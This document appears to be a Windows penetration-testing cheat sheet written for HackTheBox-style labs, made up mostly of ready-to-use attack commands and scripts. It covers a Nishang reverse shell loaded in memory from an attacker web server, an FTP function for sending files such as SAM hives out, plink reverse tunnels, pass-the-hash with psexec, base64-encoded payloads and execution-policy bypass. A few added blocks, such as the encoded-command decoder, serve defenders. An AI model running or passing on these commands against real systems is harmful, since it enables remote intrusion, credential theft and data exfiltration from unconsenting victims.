Useful commands

Reverse Shell File

# Payload
https://podalirius.net/en/articles/windows-reverse-shells-cheatsheet/

# File
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Client

# Save the script as shell.ps1 and append this line so the function runs as soon as the script is loaded
Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port <attacker-port>

#Host the file 
python3 -m http.server 8888

#Set up listener 
nc -nlvp 4444

Server

# Fetch from the http.server port (8888), not the nc listener port; the script connects back to 4444 by itself
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:8888/shell.ps1')"

Reverse shell generator

https://www.revshells.com

File upload

Client

python3 -m http.server 8888

Server

powershell "IEX (New-Object Net.WebClient).DownloadString('http://X.X.X.X:8888/file.ps1')"

(Optional) Download to disk (the Downloads folder) instead of running the file in memory

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.35:8888/40584.exe', 'C:\Users\<USER>\Downloads\40584.exe')"

File exfiltration

Kali

# -w grants the anonymous user write (upload) access; without it the server is read-only
python3 -m pyftpdlib -p 21 -w

Windows
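The Windows side of this exfiltration, as an added example that is not part of the original notes: a PowerShell function that pushes a file to the pyftpdlib server with WebClient's FTP support. The Kali address 10.10.16.35 (the attacker IP used elsewhere on this page) is an assumption; pyftpdlib's CLI serves the anonymous account by default and -w makes it writable.

```powershell
# Added example, not from the original notes: the Windows side of the
# pyftpdlib exfiltration. Kali runs `python3 -m pyftpdlib -p 21 -w`, which
# serves its current directory to the anonymous user with write access.
# Assumption: Kali is 10.10.16.35 (the attacker IP used elsewhere in these
# notes); adjust -FtpHost if yours differs.
function Send-FileViaFtp {
    param(
        [Parameter(Mandatory)] [string] $Path,        # local file to exfiltrate
        [string] $FtpHost = '10.10.16.35',             # Kali IP (assumption)
        [int]    $Port    = 21,
        [string] $User    = 'anonymous',               # pyftpdlib's default account
        [string] $Pass    = 'anonymous@'
    )

    $file = Get-Item -LiteralPath $Path -ErrorAction Stop
    # Keep the original file name on the server side
    $uri  = 'ftp://{0}:{1}/{2}' -f $FtpHost, $Port, $file.Name

    $client = New-Object System.Net.WebClient
    $client.Credentials = New-Object System.Net.NetworkCredential($User, $Pass)
    try {
        # STOR uploads the whole file in one request; FtpWebRequest uses passive
        # mode by default, so only an outbound connection from the target is needed
        $null = $client.UploadFile($uri, 'STOR', $file.FullName)
        [pscustomobject]@{ File = $file.FullName; Bytes = $file.Length; Uri = $uri }
    }
    catch [System.Net.WebException] {
        throw "FTP upload of $($file.FullName) failed: $($_.Exception.Message)"
    }
    finally {
        $client.Dispose()
    }
}

# Usage from the compromised host, e.g. a saved hive you want to crack offline:
# Send-FileViaFtp -Path C:\Windows\Temp\sam.save
```

Upload is over plaintext FTP on port 21, so anything you move this way is visible on the wire; fine on a lab VPN, not on a client network without agreement.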

Check whether a command is executed by cmd or PowerShell (prints CMD or PowerShell)

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

World writeable paths

c:\windows\system32\microsoft\crypto\rsa\machinekeys
c:\windows\system32\tasks_migrated\microsoft\windows\pla\system
c:\windows\syswow64\tasks\microsoft\windows\pla\system
c:\windows\debug\wia
c:\windows\system32\tasks
c:\windows\syswow64\tasks
c:\windows\tasks
c:\windows\registration\crmlog
c:\windows\system32\com\dmp
c:\windows\system32\fxstmp
c:\windows\system32\spool\drivers\color
c:\windows\system32\spool\printers
c:\windows\system32\spool\servers
c:\windows\syswow64\com\dmp
c:\windows\syswow64\fxstmp
c:\windows\temp
c:\windows\tracing

Check writeable paths script

# Test-Path only proves the directory exists; actually create (and remove) a file in each one and print the ones that work
Get-ChildItem -Directory -Recurse -ErrorAction SilentlyContinue | ForEach-Object { $probe = Join-Path $_.FullName ([IO.Path]::GetRandomFileName()); try { New-Item -ItemType File -Path $probe -ErrorAction Stop | Out-Null; Remove-Item $probe -Force -ErrorAction SilentlyContinue; $_.FullName } catch {} }
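A fuller version of the writeable-path check, added here as an example and not part of the original notes: for each candidate directory it reads the ACL to report which ACE grants the current token write rights, then confirms with a probe write, because deny ACEs, inheritance and generic-rights ACEs make the ACL view alone unreliable. The candidate list in the usage section is a subset of the world-writeable paths above plus the PATH directories; the function name is this example's own.

```powershell
# Added example, not from the original notes: ACL view plus probe write for
# each candidate directory. Pipe in the "World writeable paths" list or any
# other directories you want to check.
function Test-WritableDirectory {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)] [string] $Path)

    begin {
        # Every SID the current token can be matched against: user + groups
        # (Everyone, Authenticated Users, BUILTIN\Users ... are all in Groups)
        $token  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
        $mySids = @($token.User.Value) + @($token.Groups | ForEach-Object { $_.Value })
        $writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                           [System.Security.AccessControl.FileSystemRights]::Modify -bor
                           [System.Security.AccessControl.FileSystemRights]::FullControl)
    }
    process {
        if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return }

        # 1. ACL view: Allow ACEs for one of our SIDs carrying any write-class bit.
        #    Reading the ACL can itself be denied (e.g. MachineKeys), hence the try.
        #    Generic-rights ACEs (GENERIC_WRITE etc.) are not covered by the mask;
        #    the probe below catches those.
        $grants = @()
        try {
            $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
            $grants = @($acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
                Where-Object {
                    $_.AccessControlType -eq 'Allow' -and
                    $mySids -contains $_.IdentityReference.Value -and
                    ([int]$_.FileSystemRights -band $writeMask) -ne 0
                })
        } catch { }

        # 2. Ground truth: create and delete a random file name
        $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
        $canWrite = $false
        try {
            [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
            $canWrite = $true
            Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        } catch { }

        # Resolve SIDs to names for the report, falling back to the raw SID
        $who = @()
        foreach ($ace in $grants) {
            try   { $name = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $name = $ace.IdentityReference.Value }
            $who += '{0} ({1})' -f $name, $ace.FileSystemRights
        }

        [pscustomobject]@{
            Path      = $Path
            Writable  = $canWrite
            GrantedBy = ($who -join '; ')
        }
    }
}

# Usage: a few of the default-writable paths from the list above, plus the
# PATH directories (a writable PATH entry is a DLL/EXE hijack candidate)
$candidates = @(
    'C:\Windows\Tasks', 'C:\Windows\Temp', 'C:\Windows\Tracing',
    'C:\Windows\System32\spool\drivers\color', 'C:\Windows\Registration\CRMLog'
) + ($env:Path -split ';' | Where-Object { $_ })
$candidates | Test-WritableDirectory | Where-Object { $_.Writable } | Format-Table -AutoSize
```

A directory that shows Writable = True with an empty GrantedBy column is one where access came from a generic-rights ACE or from ownership rather than an explicit Write/Modify/FullControl grant; the probe write is the answer that matters, the ACL column tells you who else can do the same.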

Internal port forwarding

HTB blocks port 22, so move Kali's sshd to 2222 in sshd_config and pass -P 2222 to plink when connecting back.

Kali ssh configuration

nano /etc/ssh/sshd_config

Uncomment and change these lines (PermitRootLogin yes only for the engagement: root needs a password set with passwd, and revert it afterwards):

Port 2222
PermitRootLogin yes

Then restart sshd:

service ssh restart

Connection

Download plink.exe https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Upload plink to the server using the way described in File Upload section.

Connect back to Kali's ssh from the target. The generic form is below; with plink it is the same -R argument plus -ssh -P 2222 -l root -pw <password>, and <gateway> is the Kali IP.

ssh -p 2222 <gateway> -R <remote port to bind>:<local host>:<local port>

Answer y to plink's host-key prompt, then hit Enter a few times until the remote prompt appears. The tunnel lives as long as that session, so leave it open.

Check that the port is listening on Kali's localhost (-R binds to 127.0.0.1 on the ssh server side by default):

ss -tlnp   # or netstat -tlnp

Connect to the forwarded service on Kali via 127.0.0.1:<remote port to bind>.
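The same tunnel driven from a non-interactive reverse shell, as an added example that is not part of the original notes: a PowerShell wrapper that answers plink's host-key prompt by piping `y` into it and keeps only the port forwarding open. It assumes plink.exe was uploaded to C:\Windows\Temp (one of the default-writable paths above), that Kali's sshd listens on 2222 as root per the sshd_config change above, and that Kali is 10.10.16.35, the attacker IP used elsewhere on this page; the function name is this example's own.

```powershell
# Added example, not from the original notes: launch plink from the victim so a
# service bound to its loopback appears on Kali's loopback.
# Assumptions: plink.exe at C:\Windows\Temp, Kali sshd on 2222 as root,
# Kali at 10.10.16.35 (the attacker IP used elsewhere in these notes).
function Start-PlinkReverseTunnel {
    param(
        [Parameter(Mandatory)] [int]    $TargetPort,       # e.g. 1433 bound to 127.0.0.1 on the victim
        [Parameter(Mandatory)] [string] $SshPassword,      # Kali root password (visible in the victim's process list!)
        [int]    $KaliPort = $TargetPort,                  # port that opens on Kali's 127.0.0.1
        [string] $KaliHost = '10.10.16.35',                # assumption
        [int]    $SshPort  = 2222,                         # assumption: sshd moved off 22
        [string] $SshUser  = 'root',
        [string] $Plink    = 'C:\Windows\Temp\plink.exe'   # assumption
    )
    if (-not (Test-Path -LiteralPath $Plink)) { throw "plink.exe not found at $Plink" }

    # plink asks to cache Kali's host key on first use; `echo y|` answers it
    # because nothing interactive is available from a reverse shell.
    # -N: no remote shell, port forwarding only, so the session does not die
    #     when the piped stdin closes.
    # -R kaliPort:127.0.0.1:targetPort: listen on Kali, connect out on the victim.
    $plinkArgs = "-ssh -N -P $SshPort -l $SshUser -pw $SshPassword -R ${KaliPort}:127.0.0.1:${TargetPort} $KaliHost"
    $proc = Start-Process -FilePath 'cmd.exe' `
        -ArgumentList "/c echo y|`"$Plink`" $plinkArgs" `
        -WindowStyle Hidden -PassThru

    # If the tunnel drops as soon as the pipe closes on your plink build, run it
    # interactively instead (drop -N and answer the prompt by hand).
    Start-Sleep -Seconds 3
    if ($proc.HasExited) {
        throw "plink exited immediately (code $($proc.ExitCode)): wrong port/credentials or Kali unreachable"
    }
    [pscustomobject]@{
        Pid          = $proc.Id
        KaliEndpoint = "127.0.0.1:$KaliPort"
        Forwards     = "127.0.0.1:$TargetPort on the victim"
    }
}

# Usage: expose the victim's loopback-only MSSQL on Kali's 1433, then on Kali
# check with `ss -tlnp | grep 1433` and connect to 127.0.0.1:1433
# Start-PlinkReverseTunnel -TargetPort 1433 -SshPassword '<kali-root-password>'
```

The password sits in the victim's process command line for as long as plink runs, so use a throwaway tunnel account or key-based auth (plink -i) on anything but a lab box.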

Connections

RDP Connection

Normal

xfreerdp /v:<IP> /u:<USER> /p:<PASSWORD>

Retina display (MAC)

xfreerdp /v:<IP> /u:<USER> /p:<PASSWORD> /scale:180 /scale-desktop:200 /w:2560 /h:1440

Domain

xfreerdp /v:<IP> /u:<DOMAIN>\\<USER> /p:<PASSWORD> /scale:180 /scale-desktop:200 /w:2560 /h:1440

Evil-winrm

evil-winrm needs the user's credentials (a password, or an NTLM hash via -H) and the user has to be a local admin or a member of Remote Management Users on the target. WinRM listens on 5985 (HTTP) or 5986 (HTTPS, add -S), so make sure one of them is reachable.

evil-winrm -i <IP_ADDRESS> -u <USERNAME> -p <PASSWORD>

PsExec /wmiexec / smbexec

psexec, smbexec and wmiexec (impacket-smbexec and impacket-wmiexec take the same arguments) all need a local-admin account on the target, either its password or its NTLM hash. psexec additionally needs a writable share (it uploads a service binary, ADMIN$ by default); wmiexec creates no service and drops no binary, so it leaves the fewest artifacts.

Credentials

impacket-psexec <domain>/<user>:<password>@<victim_ip>

Hash

impacket-psexec <domain>/<user>@<victim_ip> -hashes <LMHash:NTHash> # LMHash can be 32 zeros or the empty-password LM hash aad3b435b51404eeaad3b435b51404ee

Powershell BASE64 obfuscation

The command is base64 over UTF-16LE ("Unicode" in .NET), not UTF-8; a UTF-8-encoded payload decodes to garbage and fails to parse.

Get the payload

$command = '<COMMAND_TO_ENCODE>'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand

Execute the payload

powershell -enc <ENCODED_PAYLOAD>
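The encoding step above, plus the reverse direction a defender needs, as an added example that is not part of the original notes: functions that build an -EncodedCommand payload, decode one back, and pull the encoded blob out of a captured process command line. The sample command line is constructed for the example and the cradle uses 10.10.16.35, the attacker IP used elsewhere on this page; the function names are this example's own.

```powershell
# Added example, not from the original notes: encode for -EncodedCommand and
# decode the other way, e.g. from a Sysmon event 1 / 4688 command line.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)] [string] $Command)
    # -EncodedCommand wants base64 of UTF-16LE ("Unicode" in .NET). UTF-8 input
    # decodes to garbage and fails to parse, so never use [Text.Encoding]::UTF8 here.
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)] [string] $Encoded)
    $bytes = [Convert]::FromBase64String($Encoded)
    if ($bytes.Length % 2 -ne 0) { throw 'Odd byte count: not a UTF-16LE payload' }
    [System.Text.Encoding]::Unicode.GetString($bytes)
}

function Get-EncodedCommandFromCommandLine {
    param([Parameter(Mandatory)] [string] $CommandLine)
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
    # -enc, ...). The character class keeps -ExecutionPolicy / -ep from matching.
    if ($CommandLine -match '-e[ncodema]*\s+([A-Za-z0-9+/=]+)') {
        ConvertFrom-EncodedCommand $Matches[1]
    }
}

# Attacker side: the download cradle from the File upload section, encoded
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.35:8888/file.ps1')"
$encoded = ConvertTo-EncodedCommand $cradle
"powershell -NoProfile -EncodedCommand $encoded"

# Defender side: constructed process-creation command line, decoded back
$captured = "powershell.exe -nop -w hidden -enc $encoded"
$decoded  = Get-EncodedCommandFromCommandLine $captured
if ($decoded -ne $cradle) { throw 'round trip failed' }
$decoded
```

Encoding hides nothing from anyone who logs command lines; `-enc`, `-nop` and `-w hidden` together are themselves a common detection signature, so treat this as convenience for quoting, not as evasion.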

PowerShell scripts do not run

Execution policy blocks .ps1 files by default. It is not a security boundary; start PowerShell with it bypassed (-ep is short for -ExecutionPolicy):

powershell -ep bypass

Windows kernel exploits

https://github.com/SecWiki/windows-kernel-exploits
